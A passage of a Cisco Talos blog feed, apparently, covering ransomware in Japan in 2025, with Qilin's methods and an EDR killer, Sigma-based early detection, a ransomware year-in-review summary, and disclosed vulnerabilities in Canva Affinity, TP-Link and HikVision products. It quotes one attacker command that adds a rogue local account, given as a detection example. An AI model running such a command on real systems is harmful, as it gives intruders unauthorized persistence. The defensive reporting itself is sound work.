https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/japan-classification.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/japan-classification.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/japan-classification.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 3. Classification of victim organizations by capital size.</span></figcaption></figure><p>Figure 4 highlights which ransomware groups targeted Japan in 2025. Qilin accounts for the largest share at 16.4% of all incidents, representing approximately four times the number of cases attributed to Lynx, the second most active group. While Qilin caused the highest number of incidents, the data also indicates that many other ransomware groups are actively targeting organizations in Japan.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/japan-types.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1793" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/japan-types.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/japan-types.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/japan-types.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/japan-types.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 4. Types of ransomware employed in attacks.</span></figcaption></figure><h2 id="factors-behind-qilin%E2%80%99s-growing-attack-activity">Factors behind Qilin&#x2019;s growing attack activity</h2><p>In 2025, Qilin became the ransomware group responsible for the highest number of victims worldwide. In October alone, the number of victim organizations listed on its leak site exceeded approximately 200 (see Figure 5).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qilin-victims.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1099" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/qilin-victims.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/qilin-victims.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/qilin-victims.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/qilin-victims.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 5. Number of victims listed on Qilin ransomware leak site.</span></figcaption></figure><p>Below, Talos examines the reasons behind Qilin&#x2019;s significant increase in attack volume from three key perspectives.</p><p>First, Qilin primarily relies on stolen credentials to gain initial access. In the example shown in Figure 6, credentials were obtained through platforms such as Telegram, Breach Forums, and other online platforms. After successfully breaching a target environment, the group places considerable emphasis on post-compromise activities, allowing it to methodically expand its control and maximize impact.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qilin-credential.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="872" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/qilin-credential.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/qilin-credential.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/qilin-credential.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/qilin-credential.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 6. Credential exposure identified across multiple accounts.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qilin-telegram.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="885" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/qilin-telegram.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/qilin-telegram.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/qilin-telegram.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/qilin-telegram.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 7. Telegram post suggesting that an initial access broker (IAB) may be communicating with a Qilin affiliate.</span></figcaption></figure><p>Second, posts suggesting that the operators are mindful of penetration testers indicate a relatively high level of operational maturity. This awareness implies that Qilin likely maintains well-developed attack manuals that function as practical, step-by-step references for conducting intrusions efficiently.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/Post-by-Haise--one-of-Qilin---s-operators.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="349" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/Post-by-Haise--one-of-Qilin---s-operators.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/Post-by-Haise--one-of-Qilin---s-operators.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/Post-by-Haise--one-of-Qilin---s-operators.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/Post-by-Haise--one-of-Qilin---s-operators.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 8. Post by Haise, one of Qilin&#x2019;s operators.</span></figcaption></figure><p>Finally, 2025&#x2019;s statistics show that Qilin most frequently targets industries such as manufacturing; professional, scientific, and technical services; wholesale trade; health care and social assistance; and construction. Among these, health care and social assistance stands out as a particular focus, suggesting that Qilin tends to prioritize sectors where ransomware-induced operational disruptions can cause especially severe consequences.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qilin-sectors.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1843" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/qilin-sectors.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/qilin-sectors.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/qilin-sectors.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/qilin-sectors.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 9. Sectors experiencing impact from Qilin.</span></figcaption></figure><h2 id="qilin-affiliate-use-of-edr-killer-malware">Qilin affiliate use of EDR killer malware</h2><p>Talos recently discovered a Qilin affiliate leveraging malware specifically designed to disable EDR on victim endpoints. This tooling is intended to bypass endpoint security monitoring and enable attackers to operate with reduced visibility on compromised systems. A detailed technical analysis of this malware is available in <a href="https://blog.talosintelligence.com/qilin-edr-killer/" rel="noreferrer">the following article</a>.</p><p>The final payload deployed by this malware is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of commercial solutions.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/10.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="562" height="698"><figcaption><span style="white-space: pre-wrap;">Figure 10. Excerpt list of targeted EDR solutions.</span></figcaption></figure><p>The malware implements geo-fencing, specifically excluding systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the malware terminates if a locale from the exclusion list is detected. This indicates that the threat actor is specifically attempting to avoid infecting systems in this region, a tactic commonly used by threat actors in this region to avoid encouraging law enforcement action against their operation(s).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/11.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="602" height="247" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/11.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/11.png 602w"><figcaption><span style="white-space: pre-wrap;">Figure 11. Geo-fencing function.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/12.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="602" height="366" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/12.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/12.png 602w"><figcaption><span style="white-space: pre-wrap;">Figure 12. Geo-fencing excluded localization list.</span></figcaption></figure><h2 id="threat-detection-during-the-pre%E2%80%91ransomware-phase">Threat detection during the pre&#x2011;ransomware phase</h2><p>Based on Talos&#x2019; investigation of multiple Qilin cases, ransomware execution occurred on average approximately six days after the initial compromise. This highlights the critical need to detect attacker activity at the earliest possible stage and to disrupt their operations before ransomware deployment. However, to detect attacker activity at an early stage, it is also necessary to monitor the standard commands attackers commonly use. This approach carries the risk of generating many false positives and therefore requires careful consideration. To help reduce false positives, we recommend the following three approaches:</p><p>      &#x2022; Trigger alerts based on the correlation of multiple events.<br>      &#x2022; Determine whether an account is deviating from its expected role.<br>      &#x2022; Whether the execution occurred outside of normal operating hours.</p><p>For example, attackers often create user accounts using commands such as the following, which makes it important to have a mechanism in place to verify whether these accounts are legitimate.</p>
<!--kg-card-begin: html-->
<code>net user Attacker1 Password@123 /add</code>
<!--kg-card-end: html-->
<p>Figure 13 shows the detection points within the tactics, techniques, and procedures (TTPs) of the pre-ransomware stage of Qilin attacks. In this example, we define the pre-ransomware phase as the period prior to the execution of ransomware, covering the stages from Initial Access through the execution of SystemBC . For details on the attack chain from the initial intrusion to the execution of the Qilin ransomware, please refer to <a href="https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/" rel="noreferrer">the following blog</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/qilin-key-detection.jpg" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="2000" height="1944" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/qilin-key-detection.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/qilin-key-detection.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/qilin-key-detection.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/03/qilin-key-detection.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 13. Key detection points for impact mitigation.</span></figcaption></figure><p>In this blog, we share a total of 12 Sigma rules, some of which are accompanied by correlation rules to help reduce false positives.</p><p>In the example shown in Figure 14, the rule is designed to detect the use of the net user command. However, if this rule is used on its own, it may also trigger alerts when the command is executed by legitimate administrators. The correlation rules are tuned based on analysis of log data. For the correlation rule associated with the net user command, an alert is generated only when the command is executed at least three times within a 15-minute time window (see Figure 15).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/14.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="567" height="338"><figcaption><span style="white-space: pre-wrap;">Figure 14. Sigma rule: net user &lt;username&gt; Execution.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/15_sigma_2.png" class="kg-image" alt="An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases" loading="lazy" width="1540" height="585" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/15_sigma_2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/15_sigma_2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/15_sigma_2.png 1540w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 15. Sigma correlation rule: net user &lt;username&gt; Execution.</span></figcaption></figure><p>The Sigma and YARA rules are published <a href="https://github.com/Cisco-Talos/Other">here</a>. Please adjust them according to your organization&#x2019;s environment.</p><p>For more information on the defensive approaches discussed in this blog and Qilin&apos;s detailed TTPs, please refer to the related <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_8_takahiro_takeda_en.pdf">materials</a> for more details.</p><h2 id="coverage">Coverage</h2><p>The following ClamAV signatures detect and block this threat:</p><p>Win.Malware.Bumblebee-10056548-0<br>Win.Tool.EdrKiller-10059833-0<br>Win.Tool.ThrottleStop-10059849-0</p><p>The following SNORT&#xAE; rules (SIDs) detect and block this threat:&#xA0;<br><br>Covering Snort 2 SID(s): 66181, 66180<br>Covering Snort 3 SID(s): 301456</p><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)</h2><p>The IOCs can also be found in our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/blob/main/2026/04/overview-of-ransomware-threats-in-japan.txt" rel="noreferrer">here</a>.</p>]]></content:encoded></item><item><title><![CDATA[Ransomware in 2025: Blending in is the strategy]]></title><description><![CDATA[A summary of the top ransomware trends from the Talos 2025 Year in Review, with a focus on identity, attacker tactics, and practical defenses.]]></description><link>https://blog.talosintelligence.com/ransomware-in-2025-blending-in-is-the-strategy/</link><guid isPermaLink="false">69c6c4d29610580001d2fba6</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><category><![CDATA[ransomware]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Tue, 31 Mar 2026 10:00:02 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/2025YiR-topic_ransomware.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/2025YiR-topic_ransomware.jpg" alt="Ransomware in 2025: Blending in is the strategy"><p>Ransomware attacks aren&#x2019;t smash-and-grab anymore. They&#x2019;re built on access that already looks legitimate &#x2014; closer to positioning chess pieces than breaking the door down.</p><p>That&#x2019;s the big trend&#xA0;that comes through in the ransomware data from the&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/"><u>Talos 2025 Year in Review</u></a>. Once attackers have initial access (and 40% of the time it&#x2019;s through phishing) they move the way a user or administrator would: logging in, checking systems, and using the same remote access tools that are already installed.</p><p>In fact, one of the biggest&#xA0;challenges for defenders today is that ransomware actors are deliberately trying to overlap with everyday activity.&#xA0;RDP, PowerShell, and PsExec are the top three tools that are used by ransomware actors, but in many environments, these tools are part of normal operations.</p><p>The difference is how they&#x2019;re being used. If they&#x2019;re being used to expand access and move across systems, this should raise a few red flags. I&#x2019;m not sure it&#x2019;s possible to emphasise enough how important your asset management comes into play here &#x2014; having clear asset inventories and network behaviour baselines and conducting continuous anomaly monitoring.</p><p>Like the rest of the Talos Year in Review, identity is what ties everything together. Valid accounts show up across nearly every stage of ransomware attacks: initial access, lateral movement, and execution.&#xA0;</p><h2 id="top-targeted-sectors">Top-targeted sectors</h2><p>From our ransomware data analysis, manufacturing continues to be the most targeted sector, which reflects how challenging these environments are to monitor closely. There&#x2019;s a mixture of systems, users, and processes, often with limited tolerance for disruption.</p><p>Professional, scientific, and technical services (second on the most targeted sectors list) face similar exposure, especially when access spans multiple systems or organizations.</p><h2 id="most-prolific-ransomware-groups">Most prolific ransomware groups</h2><p>The ransomware-as-a-service (RaaS) groups have had a bit of a shakeup. After LockBit topped our 2024 report, the group fell to 35<sup>th</sup>&#xA0;this year following sustained law enforcement pressure. Qilin, a constant pain in the &#x201C;you-know-what&#x201D; for our incident responders for over a year now, came in at No. 1.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-f5271f1b-9f69-4f7c-950e-efb1ced6a44d.jpeg" class="kg-image" alt="Ransomware in 2025: Blending in is the strategy" loading="lazy" width="1432" height="645" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/data-src-image-f5271f1b-9f69-4f7c-950e-efb1ced6a44d.jpeg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/data-src-image-f5271f1b-9f69-4f7c-950e-efb1ced6a44d.jpeg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/data-src-image-f5271f1b-9f69-4f7c-950e-efb1ced6a44d.jpeg 1432w" sizes="(min-width: 720px) 720px"></figure><p>Qilin uses a double-extortion approach, combining data encryption with threats to release stolen information publicly. According to their data leak site, in 2025, Qilin targeted more than 40 victims every month except January, signaling that this ransomware group will remain a persistent and significant threat in 2026.</p><p>Akira and Play (No. 2 and 3 in the chart) had continued success, which can likely be credited to their evolving and adaptable tactics and absorption of affiliates from defunct ransomware groups (i.e., LockBit).</p><h2 id="an-opportunity-for-defenders">An opportunity for defenders</h2><p>What&#x2019;s interesting to note is that for the second year running, January saw lower activity, likely tied to holiday slowdowns and Eastern European public holidays.</p><p>It may be wise for security teams to consider testing ransomware defenses in months where activity levels are generally lower, such as January, as there is a reduced chance of interfering with real incidents.</p><h2 id="defender-recommendations">Defender recommendations</h2><ul><li>Strengthen identity protections. Actors predominately targeted the person who holds the key rather than the lock itself (i.e., the target&#x2019;s infrastructure). Phishing and social engineering training is highly recommended.</li><li>Monitor the use of built-in administrative tools such as RDP, PowerShell, and PsExec for lateral movement. Look for unexpected usage patterns, and abnormal access requests.</li><li>Basics, basics, basics! They very much still hold true. Strengthen your backup, EDR, segmentation, logging, and recovery capabilities.</li><li>Regularly test ransomware response readiness.</li></ul><p>Read the full&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/"><u>2025 Talos Year in Review</u></a>&#xA0;to dig deeper into ransomware trends, vulnerability exploitation, phishing and MFA bypass, state-sponsored activity, and how AI is shaping the threat landscape.</p>]]></content:encoded></item><item><title><![CDATA[TP-Link, Canva, HikVision vulnerabilities]]></title><description><![CDATA[<p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed a vulnerability in HikVision, as well as 10 in TP-Link, and 19 in Canva.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"><u> Cisco&#x2019;s third-party vulnerability disclosure policy</u></a>.</p><p>For</p>]]></description><link>https://blog.talosintelligence.com/tp-link-canva-hikvision-vulnerabilities/</link><guid isPermaLink="false">69c297358f3b4700016ef30b</guid><category><![CDATA[Vulnerability Roundup]]></category><dc:creator><![CDATA[Kri Dontje]]></dc:creator><pubDate>Thu, 26 Mar 2026 18:34:26 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/vuln_roundup-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/vuln_roundup-1.jpg" alt="TP-Link, Canva, HikVision vulnerabilities"><p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed a vulnerability in HikVision, as well as 10 in TP-Link, and 19 in Canva.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"><u> Cisco&#x2019;s third-party vulnerability disclosure policy</u></a>.</p><p>For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from<a href="https://snort.org/"><u> Snort.org</u></a>, and our latest Vulnerability Advisories are always posted on<a href="https://talosintelligence.com/vulnerability_reports"><u> Talos Intelligence&#x2019;s website</u></a>.&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;</p><h2 id="canva-affinity-vulnerabilities"><strong>Canva Affinity vulnerabilities</strong></h2><p><em>Discovered by KPC of Cisco Talos.</em></p><p>Canva Affinity is a free-to-use tool for pixel and vector art manipulation used in graphic and document design.</p><p>Talos researchers found 19 vulnerabilities in Affinity. Eighteen of them are out-of-bounds read vulnerabilities in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit these vulnerabilities to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.</p><ul><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2311"><u>TALOS-2025-2311</u></a> (CVE-2025-64776)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2310"><u>TALOS-2025-2310</u></a> (CVE-2025-64301)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2300"><u>TALOS-2025-2300</u></a> (CVE-2025-64733)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2319"><u>TALOS-2025-2319</u></a> (CVE-2025-66042)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2321"><u>TALOS-2025-2321</u></a> (CVE-2025-62403)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2314"><u>TALOS-2025-2314</u></a> (CVE-2025-58427)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2298"><u>TALOS-2025-2298</u></a> (CVE-2025-62500)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2299"><u>TALOS-2025-2299</u></a> (CVE-2025-61979)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2317"><u>TALOS-2025-2317</u></a> (CVE-2025-61952)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2316"><u>TALOS-2025-2316</u></a> (CVE-2025-47873)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2318"><u>TALOS-2025-2318</u></a> (CVE-2025-66503)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2324"><u>TALOS-2025-2324</u></a> (CVE-2026-20726)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2301"><u>TALOS-2025-2301</u></a> (CVE-2025-66000)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2320"><u>TALOS-2025-2320</u></a> (CVE-2025-65119)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2325"><u>TALOS-2025-2325</u></a> (CVE-2026-22882)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2315"><u>TALOS-2025-2315</u></a> (CVE-2025-66617)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2313"><u>TALOS-2025-2313</u></a> (CVE-2025-66633)</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2312"><u>TALOS-2025-2312</u></a> (CVE-2025-64735)</li></ul><p>The last vulnerability is <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2297"><u>TALOS-2025-2297</u></a> (CVE-2025-66342), a type confusion vulnerability in the EMF functionality of Canva Affinity. A specially crafted EMF file can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution.</p><h2 id="tp-link-vulnerabilities"><strong>TP-Link vulnerabilities</strong></h2><p><em>Discovered by Lilith &gt;_&gt; of Cisco Talos.</em></p><p>The TP-Link Archer AX53 is a dual band gigabit Wi-Fi router. Talos researchers found 10 vulnerabilities in the router functionality.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2290"><u>TALOS-2025-2290</u></a> (CVE-2025-62673) is a stack-based buffer overflow vulnerability in the tdpServer ssh port update functionality of Tp-Link AX53. A specially crafted network packet can lead to stack-based buffer overflow.</p><p>These eight vulnerabilities exist in the tmpServer opcode of the AX53:</p><ul><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2283"><u>TALOS-2025-2283</u></a> (CVE-2025-59482): Buffer overflow</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2284"><u>TALOS-2025-2284</u></a> (CVE-2025-62405): Stack-based buffer overflow</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2285"><u>TALOS-2025-2285</u></a> (CVE-2025-59487): Write-what-where</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2286"><u>TALOS-2025-2286</u></a> (CVE-2025-61983): Out-of-bounds write</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2287"><u>TALOS-2025-2287</u></a> (CVE-2025-62404): Stack-based buffer overflow</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2288"><u>TALOS-2025-2288</u></a> (CVE-2025-61944): Out-of-bounds write</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2289"><u>TALOS-2025-2289</u></a> (CVE-2025-58455): Stack-based buffer overflow</li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2294"><u>TALOS-2025-2294</u></a> (CVE-2025-58077): Heap-based buffer overflow</li></ul><p>A specially crafted set of network packets can be sent to trigger these vulnerabilities, which can lead to arbitrary code execution.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2291"><u>TALOS-2025-2291</u></a> (CVE-2025-62501) is a misconfiguration vulnerability in the SSH Hostkey functionality. A specially crafted man-in-the-middle attack can lead to credentials leak.</p><h2 id="hikvision-buffer-overflow-vulnerability"><strong>HikVision buffer overflow vulnerability</strong></h2><p><em>Discovered by a member of Cisco Talos.</em></p><p>HikVision creates AI-trained machine perception for use in security surveillance and other monitoring hardware, including Ultra Face Recognition Terminals for authentication.</p><p>Talos researchers found<a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2281"> <u>TALOS-2025-2281</u></a> (CVE-2025-66176), a stack-based buffer overflow vulnerability, in the SADP XML parsing functionality of Hangzhou Hikvision Digital Technology Co., Ltd. Ultra Face Recognition Terminal 3.7.60_250613 and Face Recognition Terminal for Turnstyle 3.7.0_240524 (under emulation). A specially crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability.</p>]]></content:encoded></item><item><title><![CDATA[A puppet made me cry and all I got was this t-shirt]]></title><description><![CDATA[In this week's newsletter, Amy draws parallels between the collaborative themes of "Project Hail Mary" and the massive team effort behind the newly released Talos Year in Review report.]]></description><link>https://blog.talosintelligence.com/a-puppet-made-me-cry-and-all-i-got-was-this-t-shirt/</link><guid isPermaLink="false">69c2a32b8f3b4700016ef331</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Amy Ciminnisi]]></dc:creator><pubDate>Thu, 26 Mar 2026 18:00:44 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_source-3.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_source-3.jpg" alt="A puppet made me cry and all I got was this t-shirt"><p>Welcome to this week&#x2019;s edition 